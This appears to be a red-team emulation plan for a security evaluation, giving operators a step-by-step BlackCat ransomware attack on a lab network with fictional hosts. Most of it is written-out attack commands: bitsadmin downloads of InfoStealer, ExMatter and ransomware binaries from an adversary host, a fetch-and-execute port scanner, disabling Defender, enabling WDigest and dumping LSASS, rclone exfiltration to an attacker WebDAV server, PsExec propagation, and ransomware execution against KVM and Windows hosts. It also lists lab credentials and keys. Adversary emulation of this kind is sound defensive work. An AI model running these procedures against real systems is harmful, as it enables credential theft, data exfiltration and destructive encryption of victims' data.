# ALPHV BlackCat Scenario Overview

# Step 0 - Operator Setup

# ☣️ Procedures

  • Initiate an RDP session to the Kali attack host kraken (176.59.1.18)

  • Open a terminal window and start the webdav server:

    sudo rclone serve webdav /srv/http --addr 176.59.1.18:8080
  • Ensure the evalsC2server simple file server handler was started. If it hasn't been started in another terminal window, start the evalsC2server, ensuring the following handlers are enabled:

    • Simple file server
    cd alphv_blackcat/Resources/control_server
    sudo ./controlServer -c config/msr2_handler_config.yml

# Step 1 - Initial Compromise and Discovery

# 🎤 Voice Track

An Access Broker gains access to a contractor organization which provides the BlackCat affiliate with RDP access to a bastion host kimeramon (10.20.20.11) within the corporate subsidiary network used by the contractor. The BlackCat affiliate utilizes the trusted access between the compromised contractor organization to RDP to the bastion host kimeramon (10.20.20.11) within the corporate subsidiary network and download ADRecon.ps1.

The BlackCat affiliate uses ADRecon.ps1 to discover information about the Active Directory and corporate network. After analyzing the output of ADRecon, the BlackCat affiliate learns the following:

  • NetBNMBackup server datamon (10.20.10.122)
  • Linux KVM server leomon (10.20.10.16)
  • Server administrators

# ☣️ Procedures

  • Initiate an RDP session to the contractor workstation raremon (10.30.10.4)

  • From the contractor workstation raremon (10.30.10.4), RDP to the bastion host kimeramon (10.20.20.11) using the contractor's credentials:

    Username Password
    DIGIREVENGE\zorimoto tzTVgs44isT4YxWU!
  • Within the RDP session to the bastion host kimeramon (10.20.20.11), open Edge and browse to:

    https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1
    • Click the download button to "Download raw file" to the Downloads folder
  • Open a non-elevated PowerShell and execute ADRecon.ps1:

    cd Downloads
    Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass
    .\ADRecon.ps1 -Collect GroupMembers, Computers -OutputType CSV
  • Using File Explorer, browse to the ADRecon output directory to confirm ADRecon executed successfully

    • Right click the Computers.csv, hover over Open with and click LibreOffice, then OK
    • Repeat the above for GroupMembers.csv

# 🔍 Reference Code & Reporting

  1. https://www.hhs.gov/sites/default/files/blackcat-analyst-note.pdf
  2. https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/
  3. https://blog.talosintelligence.com/from-blackmatter-to-blackcat-analyzing/
  4. https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/blackcat#prevent
  5. https://www.mandiant.com/resources/blog/alphv-ransomware-backup
:link: Click to expand source code links table

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

Red Team Activity Source Code Link ATT&CK Technique Relevant CTI Report
RDP to bastion host - T1078.002 Valid Accounts: Domain Accounts Microsoft
RDP to bastion host - T1021.001 Remote Services: Remote Desktop Protocol Microsoft
Download of ADRecon.ps1 https://github.com/sense-of-security/ADRecon/blob/master/ADRecon.ps1 T1105 Ingress Tool Transfer HC3
Microsoft
Cisco
Mandiant
Open PowerShell - T1059.001 Command and Scripting Interpreter: PowerShell HC3
Microsoft
Cisco
Mandiant
Execute ADRecon Get-ADRGroupMember https://github.com/sense-of-security/ADRecon/blob/master/ADRecon.ps1#L7628 T1069.002 Permission Groups Discovery: Domain Groups HC3
Microsoft
Cisco
Mandiant
Execute ADRecon Get-ADRComputer https://github.com/sense-of-security/ADRecon/blob/master/ADRecon.ps1#L8948 T1018 Remote System Discovery HC3
Microsoft
Cisco
Mandiant

# Step 2 - Credential Access

# 🎤 Voice Track

The BlackCat affiliate notices SQL Server Management Studio is installed on the bastion host and, on opening of the application, confirms the existence of a local database modeled after the NetBNMBackup database. Using BITSAdmin.exe, the BlackCat affiliate downloads InfoStealer using BITS and executes InfoStealer against the bastion host. The output contains plaintext credentials for the SQL admin account netbnmadmin.

Using the zorimoto credentials to authenticate, the BlackCat affiliate then then RDPs to datamon (10.20.10.122) to execute InfoStealer against the NetBNMBackup server.

The decrypted output contains the plaintext passwords for:

  • The workstation local administrator account windesk
  • Linux KVM server administrator account marakawa
  • Domain admin account ykaida.da

Using the workstation local administrator account windesk, the BlackCat affiliate uses several methods to attempt to disable anti-virus and EDR solutions on the bastion host:

  • Terminate processes and stop anti-virus services via Task Manager
  • Open Windows Security and disable Real-time protection in "Virus & threat protection" settings
  • Open PowerShell and use the Set-MpPreference module to disable Defender's Real-time protection

# ☣️ Procedures

  • Within the RDP session, search for "SQL Server Management Studio".

    • In the "Connect to Server" prompt, select Sql Server Authentication for the Authentication type, if not already selected

    • Login as zorimoto (no DIGIREVENGE):

      | Username | Password |
      | -------- | -------- |
      | zorimoto | tzTVgs44isT4YxWU! |
    • On the lefthand side, in the Object Explorer expand the Databases folder.

    • Next expand NetBNMBackup > Tables and right-click dbo.Credentials, then select Select Top 1000 Rows.

      • Review the rows of data to ensure they are indicative of being an unencrypted, encoded-only NetBNMBackup duplicate.
  • Open a non-elevated cmd.exe as zorimoto then execute BITSAdmin.exe to download InfoStealer from the adversary server

    bitsadmin /transfer defaultjob2 /download http://the-inator.com/digirevenge/netbnmp.exe %TEMP%\netbnmp.exe
  • Execute InfoStealer against the bastion host and confirm output contains plaintext credentials for the SQL service account

    %TEMP%\netbnmp.exe base64 localhost zorimoto tzTVgs44isT4YxWU!
  • Within the RDP session, search for "Remote Desktop Connection" and initiate an RDP connection to datamon (10.20.10.122) using zorimoto's credentials:

    Username Password
    DIGIREVENGE\zorimoto tzTVgs44isT4YxWU!
  • Open a non-elevated cmd.exe as zorimoto then execute BITSAdmin.exe to download InfoStealer from the adversary server

    bitsadmin /transfer defaultjob /download http://the-inator.com/digirevenge/netbnmp.exe %TEMP%\netbnmp.exe
  • Execute InfoStealer against the NetBNMBackup SQL server datamon (10.20.10.122) using zorimoto's credentials and confirm output contains plaintext credentials for:

    • The workstation local administrator account windesk
    • The Linux KVM server administrator account marakawa
    • The domain adminstrator account ykaida.da
    %TEMP%\netbnmp.exe dpapi localhost zorimoto tzTVgs44isT4YxWU!
  • Close all Windows then disconnect from the RDP session to datamon (10.20.10.122). You should be returned to the RDP session to the bastion host.

  • Within the RDP session, search for Task Manager, right-click and Run as Administrator, providing the workstation local administrator account credentials when prompted.

    Username Password
    .\windesk windesk
  • Within Task Manager, navigate to the "Details" tab and, using the provided list of processes, end any matching process names

  • Within Task Manager, navigate to the "Services" tab and, using the provided list of services, end any matching service names

  • Within the RDP session, search for "Virus & threat protection". Select "Manage settings" then toggle Real-time protection to Off. Provide the workstation local administrator account credentials if prompted.

    Username Password
    .\windesk windesk
  • Open an elevated PowerShell prompt, providing the workstation local administrator account credentials windesk when prompted, and disable Defender's Real-time protection via Set-MpPreference

    Username Password
    .\windesk windesk
    Set-MpPreference -DisableRealtimeMonitoring $true

# 🔍 Reference Code & Reporting

  1. https://www.mandiant.com/resources/blog/alphv-ransomware-backup
  2. https://www.varonis.com/blog/blackcat-ransomware
  3. https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps
  4. https://blog.checkymander.com/red%20team/veeam/decrypt-veeam-passwords/
:link: Click to expand source code links table

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

Red Team Activity Source Code Link ATT&CK Technique Relevant CTI Report
Open cmd - T1059.003 Command and Scripting Interpreter: Windows Command Shell HC3
Microsoft
Cisco
Mandiant
Create BITSAdmin download job from adversary server - T1197 BITS Jobs Mandiant
Download InfoStealer via BITSAdmin.exe - T1105 Ingress Tool Transfer Mandiant
InfoStealer pulls passwords from local database cred_query T1555 Credentials from Password Stores Symantec
InfoStealer pulls passwords from NetBNMBackup cred_query T1555 Credentials from Password Stores Symantec
Authenticate with workstation local administrator account credentials - T1078.003 Valid Accounts: Local Accounts Trend Micro
Terminate processes and services related to AV - T1562.001 Impair Defenses: Disable or Modify Tools HC3
Cisco
Mandiant
Symantec
AT&T
BlackBerry
Logpoint
Disable Defender Real-time protection - T1562.001 Impair Defenses: Disable or Modify Tools HC3
Cisco
Mandiant
Symantec
AT&T
BlackBerry
Logpoint
Open PowerShell - T1059.001 Command and Scripting Interpreter: PowerShell HC3
Cisco
Mandiant
Symantec
AT&T
BlackBerry
Logpoint
Execute Set-MpPreference to disable Real-time protection - T1562.001 Impair Defenses: Disable or Modify Tools HC3
Cisco
Mandiant
Symantec
AT&T
BlackBerry
Logpoint

# Step 3 - Credential Access for Privilege Escalation

# 🎤 Voice Track

Using the plaintext credentials retrieved for the workstation local administrator account windesk, the BlackCat affiliate uses the RDP session to the bastion host kimeramon (10.20.20.11) to edit the registry and enable WDigest.

The BlackCat affiliate then dumps credentials via Task Manager and exfiltrates the dump file using rclone.

# ☣️ Procedures

  • Within the RDP session, search for Registry Editor and right-click to Run As Administrator, providing the workstation local administrator account credentials when prompted

    Username Password
    .\windesk windesk
  • Using Registry Editor, enable WDigest by browsing to HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest, right-click inside the window, New > DWORD (32-bit) Value, and type UseLogonCredential for the registry key value name. Ensure the type says REG_DWORD. Then right- click the registry key value > Modify... then change the "Value data:" field to 1.

  • Within the RDP session, search for Task Manager and right-click to Run As Administrator (if not already open), providing the workstation local administrator account credentials when prompted

    Username Password
    .\windesk windesk
  • Using Task Manager, go to Details, find lsass.exe then right-click and click "Create Dump File". In the pop up window, take note of the file location where the DMP file has been created (C:\Users\windesk\AppData\Local\Temp\lsass.DMP)

  • Within the RDP session to the bastion host kimeramon (10.20.20.11), open Edge and browse to the following link to initiate the download of rclone:

    https://github.com/rclone/rclone/releases/download/v1.64.0/rclone-v1.64.0-windows-amd64.zip
  • Go to the Downloads folder, right-click the rclone zip, click "Extract all..." from the menu, and in the window that opens, click the Extract button

  • Search for cmd.exe and right-click to Run As Administrator, providing the workstation local administrator account credentials when prompted

    Username Password
    .\windesk windesk
  • Change directory to the directory containing the rclone executable:

    cd C:\Users\zorimoto\Downloads\rclone-v1.64.0-windows-amd64\rclone-v1.64.0-windows-amd64
  • Using the cmd.exe terminal, configure rclone for exfil via WebDAV

    rclone config
    • On entry to the rclone config console, type n for "New remote" then press Enter

    • For the name of the remote, type webdav then press Enter

    • For the type of storage to configure, type 49 for "WebDAV" then press Enter

    • For the URL of the host to connect to, type http://luffaplex-dillpickle-inator.com:8080 then press Enter

    • For name of the WebDAV site, type 6 for "Other site/service or software" then press enter

    • For the user, press Enter to leave blank

    • For the password, press Enter to leave blank

    • For the token, press Enter to leave blank

    • For editing the advanced config, press Enter for "no"

    • Ensure the output configuration confirmation looks like the below

      - type: webdav
      - url: http://luffaplex-dillpickle-inator.com:8080
      - vendor: other
    • For keeping the "webdav" remote, type y for "Yes this is OK" and press Enter

    • You should now see webdav in the table of Current remotes. Type q to exit the rclone config console.

  • Using the cmd.exe terminal, exfiltrate the DMP file using rclone

    rclone copy "C:\Users\windesk\AppData\Local\Temp\lsass.DMP" webdav:
  • ➡️ Switch to your Kali RDP session and check for the exfiltrated lsass.DMP file

    sudo ls -l /srv/http

# 🔍 Reference Code & Reporting

  1. https://www.mandiant.com/resources/blog/alphv-ransomware-backup
  2. https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/
  3. https://duo.com/decipher/prolific-affiliate-threat-groups-linked-to-blackcat-ransomware
:link: Click to expand source code links table

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

Red Team Activity Source Code Link ATT&CK Technique Relevant CTI Report
Authenticate with workstation local administrator account credentials - T1078.003 Valid Accounts: Local Accounts Trend Micro
Modify WDigest via Registry Editor - T1112 Modify Registry Logpoint
Microsoft
Dump LSASS via Task Manager - T1003.001 OS Credential Dumping: LSASS Memory Logpoint
Microsoft
Open cmd - T1059.003 Command and Scripting Interpreter: Windows Command Shell HC3
Microsoft
Cisco
Mandiant
Download rclone from GitHub - T1105 Ingress Tool Transfer Mandiant
Exfiltrate lsass.DMP over WebDAV (HTTP) using rclone - T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol HC3
Logpoint
Microsoft
Cisco
Mandiant
Sophos
Sophos

# Step 4 - Collection & Exfiltration

# 🎤 Voice Track

The BlackCat affiliate downloads ExMatter and a network scanning script to identify additional targets via PowerShell using the compromised Domain Admin account digirevenge\ykaida.da. Then, the BlackCat affiliate uses PsExec to execute ExMatter against the identified targets.

On execution, ExMatter will:

  • Retrieve the drive names of all logical drives and collect all file path names
  • Use LastWriteTime to create a queue of files for exfiltration (ExMatter will only exfiltrate files larger than 1,024 bytes)
  • Upload files from the queue to a remote SFTP server using the parameters:
    • Host: hide-the-secret-password-inator.net
    • Port: 22
  • Compresses target files into a zip archive
  • Removes traces of itself by invoking PowerShell to overwrite the first 65,536 bytes then deleting itself

After remote execution of ExMatter has completed, the BlackCat affiliate executes ExMatter on the local workstation.

# ☣️ Procedures

  • Open cmd.exe (or use an existing cmd.exe running as zorimoto) and execute BITSAdmin.exe to download ExMatter from the adversary server

    bitsadmin /transfer defaultjob4 /download http://the-inator.com/digirevenge/collector1.exe %TEMP%\collector1.exe
  • Search for PowerShell and right-click to Run As Administrator, providing the Domain Admin credentials for ykaida.da when prompted

    Username Password
    digirevenge\ykaida.da FWy9aXyXbYrbxFcE!
  • Using the elevated PowerShell, download and execute the network scanning script to identify additional targets

    Invoke-Expression(Invoke-WebRequest 'http://the-inator.com/digirevenge/Empire-port-scan.ps1' -UseBasicParsing)
    Invoke-Portscan -Hosts "10.20.20.0/24" -ErrorAction SilentlyContinue | where {$_.alive -eq $true}
    Invoke-Portscan -Hosts "10.20.10.0/24" -ErrorAction SilentlyContinue | where {$_.alive -eq $true}
  • Using the elevated PowerShell, execute ExMatter via PsExec against the additional targets

    psexec -c -accepteula \\10.20.20.22,10.20.20.33,10.20.10.4,10.20.10.23,10.20.10.122,10.20.10.200 C:\Users\zorimoto\AppData\Local\Temp\collector1.exe
    • This may take some time, since ExMatter will run on each host one at a time.
  • Using File Explorer, browse to C:\Users\zorimoto\AppData\Local\Temp and then right-click collector1.exe and Run As Administrator to run ExMatter locally, providing the Domain Admin credentials for ykaida.da when prompted:

    Username Password
    digirevenge\ykaida.da FWy9aXyXbYrbxFcE!
    • 💡 For this execution of ExMatter, ExMatter's log file will be located in C:\Users\zorimoto\AppData\Local\Temp\EMlog.txt
  • Go to Verifying ExMatter Execution and follow the steps to check that ExMatter executed successfully on the both the remote target hosts and local target host.

# Verifying ExMatter Execution

  • ➡️ Return to your Kali server and open up a terminal window

  • Run the following command to check for uploaded zip archives:

    • If checking the original scenario steps:

      sudo ls -alR /srv/sftp/sftpupload/uploads/
  • Ensure that for each of the following hostnames, there is a non-empty folder whose name begins with that hostname and has non-empty zip files:

    • alphamon
    • bakemon
    • blacknoirmon
    • butchermon
    • datamon
    • kimeramon
    • stormfrontmon
  • If there are successful uploads for all hosts, proceed with the remainder of the scenario.

  • If there are zip archives missing for a given host perform the remaining instructions to fetch ExMatter log files for the host(s).

    • ➡️ return to your RDP session to the jumpbox homelander (116.83.1.29)

    • From the jumpbox, RDP into the subsidiary B domain controller blacknoirmon (10.20.10.4) as evals_domain_admin:

      Username Password
      digirevenge\evals_domain_admin axi9eengei9inaeR@
    • Open up an administrator powershell terminal and execute the following:

      psh
      $paths=@("C$\Windows\System32\EMBatLog.txt", "C$\Windows\EMBatLog.txt", "C$\Windows\System32\EMlog.txt", "C$\Windows\EMlog.txt");
      $destDir="C:\Users\evals_domain_admin\xelogs";
      $zipPath="C:\Users\evals_domain_admin\xelogs.zip";
      mkdir "$destDir" -force | Out-Null;
      $hosts=@("alphamon", "bakemon", "blacknoirmon", "butchermon", "datamon", "kimeramon", "stormfrontmon");
      foreach ($targhost in $hosts) {
          $logPath = (
              $paths | %{
                  $logPath = "\\$targhost\$_";
                  if (Test-Path "$logPath") {
                      Write-Host "[DEBUG] Found log file $logpath on $targhost";
                      get-childitem -path "$logPath"
                  }
              } | Sort-Object -Property LastWriteTime -Descending | Select-Object -First 1
          );
          if ($logPath) {
              Write-Host "[INFO] Fetching most recent log file $logPath on $targhost";
              if ("$logPath" -match "EMBatLog.txt") {
                cp "$logpath" "$destDir\dec_$targhost.log" -Force;
              } else {
                cp "$logpath" "$destDir\enc_$targhost.log" -Force;
              }
          } else {
              Write-Host "[ERROR] Failed to find log files on $targhost";
          }
      }
      Compress-Archive -Path "$destDir" -DestinationPath "$zipPath" -Force;
      scp "$zipPath" op1@176.59.1.18:/tmp/xelogs.zip;
      Remove-Item -Recurse -Force "$destDir";
      Remove-Item -Force "$zipPath";
      • When prompted, enter the credentials to Kali for SCP
    • Sign out of your RDP session

    • ➡️ Switch back to your kali terminal and execute the following to unzip and decrypt the uploaded log files:

      cd
      dirname=exmatter_logs_$(date '+%Y-%m-%dT%H-%M-%S')
      mkdir $dirname
      cd $dirname
      mv /tmp/xelogs.zip ./
      unzip xelogs.zip
      cd xelogs
      for filename in enc_*.log; do
          basename=${filename#"enc_"}
          python3 alphv_blackcat/Resources/log_decryptor/aes_base64_log_decryptor.py -i $filename -o dec_$basename -k 0370dd5addcd980e8f4b424c92d8049e99c7c7c5d09eedfcc58f6abca9e72f99 --aes-256-cbc
      done
    • For each of the hosts that were missing zip uploads, check the corresponding decrypted log file to look for errors or signs of unsuccessful/incomplete execution:

      grep -i 'error\|fail' dec_*.log
      • For hosts that had failed uploads but no matches from the grep command, you may need to actually go through the log files to look for signs of failure.

# 🔍 Reference Code & Reporting

  1. https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps
  2. https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackmatter-data-exfiltration
  3. https://www.kroll.com/en/insights/publications/cyber/analyzing-exmatter-ransomware-data-exfiltration-tool
  4. https://www.cyderes.com/blog/threat-advisory-exmatter-data-extortion/
  5. https://www.netskope.com/blog/blackcat-ransomware-tactics-and-techniques-from-a-targeted-attack
:link: Click to expand source code links table

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

Red Team Activity Source Code Link ATT&CK Technique Relevant CTI Report
Open cmd - T1059.003 Command and Scripting Interpreter: Windows Command Shell HC3
Microsoft
Cisco
Mandiant
Create BITSAdmin download job from adversary SMB share - T1197 BITS Jobs Mandiant
Download ExMatter via BITSAdmin.exe - T1105 Ingress Tool Transfer Mandiant
Open PowerShell - T1059.001 Command and Scripting Interpreter: PowerShell HC3
Microsoft
Cisco
Mandiant
Authenticate with Domain Admin account credentials - T1078.002 Valid Accounts: Domain Accounts Microsoft
Download Empire port scanner - T1105 Ingress Tool Transfer Picus
Scan ports via Empire - T1046 Network Service Discovery HC3
Microsoft
Mandiant
Sophos
Sophos
netskope
Execute ExMatter using PsExec - T1569.002 System Services: Service Execution Kroll
ExMatter retrieves the drive names of all logical drives GetDriveInfos T1083 File and Directory Discovery Symantec Kroll
ExMatter enumerates file paths FindTargetFiles T1083 File and Directory Discovery Symantec Kroll
ExMatter compresses files in a zip archive ZipFiles T1560.002 Archive Collected Data: Archive via Library Kroll
ExMatter exfiltrates files to SFTP server UploadFile T1048.002 Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol Symantec Kroll
ExMatter overwrites itself Destroy T1485 Data Destruction Symantec Symantec
ExMatter deletes itself Destroy T1070.004 Indicator Removal: File Deletion Symantec Symantec

# Step 5 - Payload Deployment

# 🎤 Voice Track

The BlackCat affliate downloads BlackCat (Linux) to the bastion host kimeramon (10.20.20.11) and uses SCP to copy BlackCat (Linux) to the Linux KVM server leomon (10.20.10.16), providing the Linux KVM server administrator credentials marakawa retrieved from InfoStealer. Next, the BlackCat affiliate sends an SSH command to the Linux KVM server to execute BlackCat (Linux) on the Linux KVM server.

BlackCat (Linux) will:

  • Discover system UUID, current username, and current hostname
  • Verify that the target machine is a KVM server
  • Enumerate and stop running virtual machines
  • Enumerate and delete virtual machine snapshots
  • Terminate a pre-defined set of processes and services that may interfere with encryption
  • Enumerate and encrypt virtual machine volumes using AES
    • Encrypted files are appended with .skyfl2e at the end the filename. Ex. "[original filename].[extension].skyfl2e"
    • Place a ransom note in folder(s) containing the encrypted VM volumes

# ☣️ Procedures

Emulate the following legitimate user activity:

  • ➡️ initiate an RDP session to the jumpbox homelander (116.83.1.29) (if not already open)

  • Open up powershell and SSH to the KVM server, typing yes to continue connecting as the KVM admin:

    ssh marakawa@10.20.10.16
    Username Password
    marakawa cuL9LmnrdnWqbqcA@
  • list all VMs regardless of running state

    sudo virsh list --all
  • list current snapshots for each VM

    sudo virsh snapshot-list fedora2
    sudo virsh snapshot-list test1
    sudo virsh snapshot-list test2
  • create additional snapshot for each VM

    sudo virsh snapshot-create-as fedora2 debugsnapshot --description "debug snapshot"
    sudo virsh snapshot-create-as test1 debugsnapshot --description "debug snapshot"
    sudo virsh snapshot-create-as test2 debugsnapshot --description "debug snapshot"
  • enumerate snapshots again

    sudo virsh snapshot-list fedora2
    sudo virsh snapshot-list test1
    sudo virsh snapshot-list test2
  • start VMs

    sudo virsh start fedora2
    sudo virsh start test1
    sudo virsh start test2
  • check VM state again

    sudo virsh list
  • terminate SSH session

    exit

Resume red team activity:

  • ➡️ switch back to your RDP session to the bastion host kimeramon (10.20.20.11)

  • Open cmd.exe (or use an existing cmd.exe running as zorimoto) and execute BITSAdmin.exe to download BlackCat (Linux) to the bastion host kimeramon (10.20.20.11) from the adversary server

    bitsadmin /transfer defaultjob5 /download http://the-inator.com/digirevenge/digirevenge %TEMP%\digirevenge
  • Open PowerShell (non-elevated) and SCP BlackCat to the Linux KVM server leomon (10.20.10.16), typing yes to continue connecting, providing the Linux KVM server administrator credentials marakawa when prompted

    scp $Env:temp\digirevenge marakawa@10.20.10.16:/tmp/digirevenge
    Password
    cuL9LmnrdnWqbqcA@
  • Using PowerShell, execute BlackCat via SSH command to the Linux KVM server, providing the Linux KVM server administrator credentials when prompted

    ssh -t marakawa@10.20.10.16 "chmod +x /tmp/digirevenge && sudo /tmp/digirevenge --access-token 15742aa362a84ba3"
    Password
    cuL9LmnrdnWqbqcA@

# Verifying BlackCat (Linux) Logs

  • ➡️ Return to your Kali server and open up a terminal window

  • Execute the following to copy the BlackCat Linux logs from the KVM server as evals_domain_admin, typing yes to continue the connection:

    cd
    scp evals_domain_admin@10.20.10.16:/home/marakawa/bc.log ~/kvm.log
    Password
    axi9eengei9inaeR@
  • Execute the following in the kali terminal to decrypt and inspect the logs:

    python3 alphv_blackcat/Resources/log_decryptor/aes_base64_log_decryptor.py -i ~/kvm.log -o ~/dec_kvm.log --aes-128-ctr -k 4a99bcca87318b844be7928cd98e23f9;
    cat ~/dec_kvm.log
    • Ensure that the logs show evidence of successful encryption activity and VM tampering.

# 🔍 Reference Code & Reporting

  1. https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware
  2. https://www.netskope.com/blog/blackcat-ransomware-tactics-and-techniques-from-a-targeted-attack
  3. https://www.mandiant.com/resources/blog/alphv-ransomware-backup
  4. https://unit42.paloaltonetworks.com/blackcat-ransomware/#Technical-Details
  5. https://assets.sophos.com/X24WTUEQ/at/q6r6n3x43mnrfchn5tfh3qmw/sophos-x-ops-active-adversary-multiple-attackers-wp.pdf
  6. https://blog.talosintelligence.com/from-blackmatter-to-blackcat-analyzing/
  7. https://cybersecurity.att.com/blogs/labs-research/blackcat-ransomware
  8. https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/
  9. https://www.varonis.com/blog/blackcat-ransomware
  10. https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/'https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware
  11. https://www.hhs.gov/sites/default/files/blackcat-analyst-note.pdf
:link: Click to expand source code links table

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

Red Team Activity Source Code Link ATT&CK Technique Relevant CTI Report
Open cmd - T1059.003 Command and Scripting Interpreter: Windows Command Shell HC3
Microsoft
Cisco
Mandiant
Create BITSAdmin download job from adversary SMB share - T1197 BITS Jobs Mandiant
Download BlackCat (Linux) via BITSAdmin.exe - T1105 Ingress Tool Transfer Mandiant
Open PowerShell - T1059.001 Command and Scripting Interpreter: PowerShell HC3
Microsoft
Cisco
Mandiant
Authenticate with Linux KVM server administrator account credentials - Valid Accounts: Domain Accounts Microsoft
Transfer BlackCat (Linux) to Linux server - T1570 Lateral Tool Transfer Varonis
Execute chmod to make BlackCat (Linux) executable - T1222 File and Directory Permissions Modification Varonis
Execute BlackCat (Linux) on Linux server - T1021.004 Remote Services: SSH Varonis
BlackCat (Linux) enumerates VMs get_vms T1057 Process Discovery Varonis
BlackCat (Linux) stops VMs shutdown_vm T1489 Service Stop Varonis
BlackCat (Linux) enumerates snapshots get_vm_snapshots T1083 File and Directory Discovery Varonis
BlackCat (Linux) deletes snapshots delete_snapshot T1490 Inhibit System Recovery Varonis
BlackCat (Linux) terminates processes killall_by_name T1489 Service Stop Microsoft
BlackCat (Linux) terminates services terminate_services T1489 Service Stop Varonis
BlackCat (Linux) enumerates VM volumes get_volume_paths T1083 File and Directory Discovery Microsoft
BlackCat (Linux) encrypts VM volumes encrypt_volumes T1486 Data Encrypted for Impact Microsoft
BlackCat (Linux) leaves ransom notes drop_ransom_note T1491.001 Defacement: Internal Defacement Microsoft

# Step 6 - Encryption for Impact/Inhibit System Discovery

# 🎤 Voice Track

The BlackCat affliate downloads BlackCat (Windows) to the bastion host kimeramon (10.20.20.11) and provides the Domain Admin credentials ykaida.da to run the executable with administrative privileges.

BlackCat (Windows) will:

  • Delete volume shadow copies via API calls
  • Disable bootloader recovery using bcdedit /set {default} recoveryenabled No
  • Run command to collect Universally Unique Identifiers (UUIDs) via WMIC.exe
  • Get current username and current hostname
  • Enable remote-to-local and remote-to-remote symbolic link evaluation via fsutil
  • Empty the recycling bin
  • Modify the registry to increase the maximum limit of concurrent network requests machines can make (for PsExec propagation and accessing remote files):
    • reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f
  • Propagate via a PsExec module embedded in BlackCat code and compressed with zlib
    • Performs NetBIOS scans on the local network to determine valid Windows hosts to propagate to
  • Enumerate all local disk partitions and mount any hidden partitions for later encryption
  • Terminate a pre-defined set of processes and services that may interfere with encryption
  • Encrypt files using AES
    • BlackCat excludes some directories, filenames, and file extensions from encryption
    • Encrypted files are appended with .skyfl2e at the end the filename. Ex. "[original filename].[extension].skyfl2e"
    • BlackCat will drop ransom notes in directories containing encrypted files
  • After encryption, BlackCat will:
    • Change wallpaper for logged-in users to image of ransom note
    • Unmount previously mounted partitions
    • Delete volume shadow copies again
    • List and clear Windows Event logs via API calls

# ☣️ Procedures

  • Open cmd.exe (or use an existing cmd.exe running as zorimoto) and execute BITSAdmin.exe to download BlackCat (Windows) to the bastion host kimeramon (10.20.20.11) from the adversary server

    bitsadmin /transfer defaultjob6 /download http://the-inator.com/digirevenge/digirevenge.exe %TEMP%\digirevenge.exe
  • Search for cmd.exe then right-click and Run As Administrator to open a new Command Prompt, providing the Domain Admin B credentials ykaida.da when prompted:

    Username Password
    ykaida.da FWy9aXyXbYrbxFcE!
  • Using the new cmd.exe with ykaida.da privileges, execute BlackCat (Windows)

    C:\Users\zorimoto\AppData\Local\Temp\digirevenge.exe --access-token 15742aa362a84ba3

# Verifying BlackCat (Windows) Logs

  • ➡️ Return to your RDP session to the Windows jumpbox homelander (116.83.1.29)

  • ➡️ From the Windows jumpbox, initiate an RDP session to blacknoirmon (10.20.10.4) Subsidiary B Domain Controller as digirevenge\evals_domain_admin:

    Username Password
    digirevenge\evals_domain_admin axi9eengei9inaeR@
  • Open an admin PowerShell prompt and execute the following to fetch the BlackCat logs from affected Subsidiary B hosts, zip them up into a single archive, and SCP the archive to the Kali server:

    $path="C$\Windows\System32\clog.xtlog";
    $destDir="C:\Users\evals_domain_admin\sblogs";
    $zipPath="C:\Users\evals_domain_admin\sblogs.zip";
    mkdir "$destDir" -force | Out-Null;
    $hosts=@("10.20.10.4", "10.20.10.200", "10.20.10.23", "10.20.10.122", "10.20.20.11", "10.20.20.22", "10.20.20.33");
    foreach ($targhost in $hosts) {
        $logPath = "\\$targhost\$path"
        if (Test-Path "$logPath") {
            Write-Host "[INFO]  Fetching log file on $targhost";
            cp "$logPath" "$destDir\$targhost.log" -Force;
        } else {
            Write-Host "[ERROR] Failed to find log file on $targhost";
        }
    }
    Compress-Archive -Path "$destDir" -DestinationPath "$zipPath";
    scp "$zipPath" op1@176.59.1.18:/tmp/sblogs.zip;
    Remove-Item -Recurse -Force "$destDir";
    Remove-Item -Force "$zipPath";
    • If prompted, type yes to continue the connection for SCP
  • ➡️ Switch to your kali server and open up a terminal window

  • Execute the following in the kali terminal to decrypt and inspect the logs:

    cd
    mv /tmp/sblogs.zip ./
    unzip sblogs.zip
    cd sblogs
    for filename in *.log; do
      python3 alphv_blackcat/Resources/log_decryptor/aes_base64_log_decryptor.py -i $filename -o dec_$filename --aes-128-ctr -k 4a99bcca87318b844be7928cd98e23f9;
    done
    • Look through each of the decrypted log files (starting with dec_*) and make sure all required activity was exected and that nothing was skipped or errored out.

# 🔍 Reference Code & Reporting

  1. https://www.varonis.com/blog/blackcat-ransomware
  2. https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Blackcat&threatId=-2147158032
:link: Click to expand source code links table

ℹ️ NOTE: Not all techniques listed in this table directly map to evaluation substeps

Red Team Activity Source Code Link ATT&CK Technique Relevant CTI Report
Open cmd - T1059.003 Command and Scripting Interpreter: Windows Command Shell HC3
Microsoft
Cisco
Mandiant
Create BITSAdmin download job from adversary SMB share - T1197 BITS Jobs Mandiant
